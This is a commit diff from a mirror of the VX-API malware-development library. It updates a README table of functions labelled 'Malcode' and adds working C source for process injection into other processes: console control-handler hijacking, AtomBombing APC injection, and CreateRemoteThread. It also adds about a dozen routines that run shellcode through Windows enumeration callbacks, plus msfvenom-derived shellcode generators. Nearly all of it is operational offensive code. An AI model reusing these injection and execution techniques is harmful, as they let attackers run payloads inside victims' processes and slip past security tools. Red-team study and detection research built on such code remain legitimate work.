mirror of https://github.com/vxunderground/VX-API
parent
0f0f9aab4c
commit
c91d3da65e
35
README.md
35
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.513
|
||||
Version: 2.0.559
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -156,12 +156,41 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromServiceManager | modexp | Malcode |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
|
||||
| ProcessInjectionMain | SafeBreach Labs | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu | Malcode |
|
||||
| MpfPiControlInjection | SafeBreach Labs | Malcode |
|
||||
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
|
||||
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
|
||||
| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
|
||||
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
|
||||
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
|
||||
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
|
||||
|
|
|
@ -2,28 +2,16 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
PBYTE Buffer = NULL;
|
||||
PCHAR Buffer = NULL;
|
||||
DWORD dwSize = 0;
|
||||
|
||||
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = (LPBYTE)GenericShellcodeOpenCalcExitThread();
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_ENUMDESKTOPSW;
|
||||
DWORD dwX = 0;*/
|
||||
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);
|
||||
|
||||
Pii.Payload = (LPBYTE)GenericShellcodeHelloWorldMessageBoxAEbFbLoop();
|
||||
Pii.dwLengthOfPayloadInBytes = 70;
|
||||
Pii.ProcessId = 33176;
|
||||
Pii.ThreadId = 18600;
|
||||
Pii.MethodEnum = E_QUEUE_USER_APC;
|
||||
MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
|
||||
|
||||
return dwError;
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
UCHAR RawPayloadBuffer[] =
|
||||
"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
|
||||
|
@ -28,10 +28,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
|
|||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
|
||||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
|
||||
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
UCHAR RawPayloadBuffer[] =
|
||||
"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
|
||||
|
@ -59,10 +61,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
|
|||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
|
||||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
|
||||
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(VOID)
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD=calc.exe -f c -a x64
|
||||
//Length = 277
|
||||
|
@ -98,5 +102,7 @@ PCHAR GenericShellcodeOpenCalcExitThread(VOID)
|
|||
|
||||
CopyMemory(Payload, RawPayloadBuffer, RawBufferSize);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
|
|
@ -0,0 +1,121 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
|
||||
{
|
||||
typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);
|
||||
RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
|
||||
HMODULE hNtdll = NULL;
|
||||
HMODULE hKernelbase = NULL;
|
||||
MODULEINFO KernelbaseInformation = { 0 };
|
||||
PCHAR KernelBaseDefaultHandler = NULL;
|
||||
PCHAR KernelBaseSingleHandler = NULL;
|
||||
DWORD64 Encoded = 0;
|
||||
DWORD ConsoleAttachList[2] = { 0 };
|
||||
DWORD ParentId = 0;
|
||||
HWND hWindow = NULL;
|
||||
PVOID EncodedAddress = NULL;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
|
||||
if (!hNtdll || !hKernelbase)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hNtdll, "RtlEncodeRemotePointer");
|
||||
if (!RtlEncodeRemotePointer)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
if (KernelBaseDefaultHandler == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
|
||||
if (Encoded == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
|
||||
if (KernelBaseSingleHandler == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(TargetProcessId);
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CloseHandle(hHandle);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = 0; // 0 for key press
|
||||
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
Sleep(100);
|
||||
|
||||
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
|
||||
|
||||
Sleep(100);
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = KEYEVENTF_KEYUP;
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Payload)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Payload);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,69 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId)
|
||||
{
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
HANDLE hThread = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
|
||||
PCHAR pPayload = (PCHAR)Payload;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
|
||||
if (!NtQueueApcThread)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, TargetThreadId);
|
||||
if (hThread == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, 0x00003000, 0x00000040);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Bravo = GlobalAddAtomA("b");
|
||||
if (Bravo == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (pPayload[0] == '\0')
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD64 Position = PayloadSizeInBytes - 1; Position > 0; Position--)
|
||||
{
|
||||
if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
|
||||
}
|
||||
|
||||
for (PCHAR Position = pPayload; Position < (pPayload + PayloadSizeInBytes); Position += strlen(Position) + 1)
|
||||
{
|
||||
if (*Position == '\0')
|
||||
continue;
|
||||
|
||||
Alpha = GlobalAddAtomA(Position);
|
||||
if (Alpha == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(StringLengthA(Position) + 1));
|
||||
}
|
||||
|
||||
QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,40 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
|
||||
{
|
||||
HANDLE hHandle = NULL, hThread = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetProcessId);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SetProcessPrivilegeToken(0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,22 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCDefFolderMenu_Create2ThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)lpParameter, 0, NULL, &ContextMenuRequired);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCDefFolderMenu_Create2ThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,23 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//CertEnumSystemStore
|
||||
|
||||
VOID InvokeCertEnumSystemStoreThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCertEnumSystemStoreLocationThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreLocationThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumChildWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumChildWindows(NULL, (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumChildWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDateFormatsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDateFormatsW((DATEFMT_ENUMPROCW)lpParameter, LOCALE_SYSTEM_DEFAULT, 0);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDateFormatsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDesktopWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDesktopsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,28 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
return;
|
||||
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDirTreeWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDisplayMonitorsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDisplayMonitorsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumFontFamiliesExWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)lpParameter, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontFamiliesExWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumFontsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumFontsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
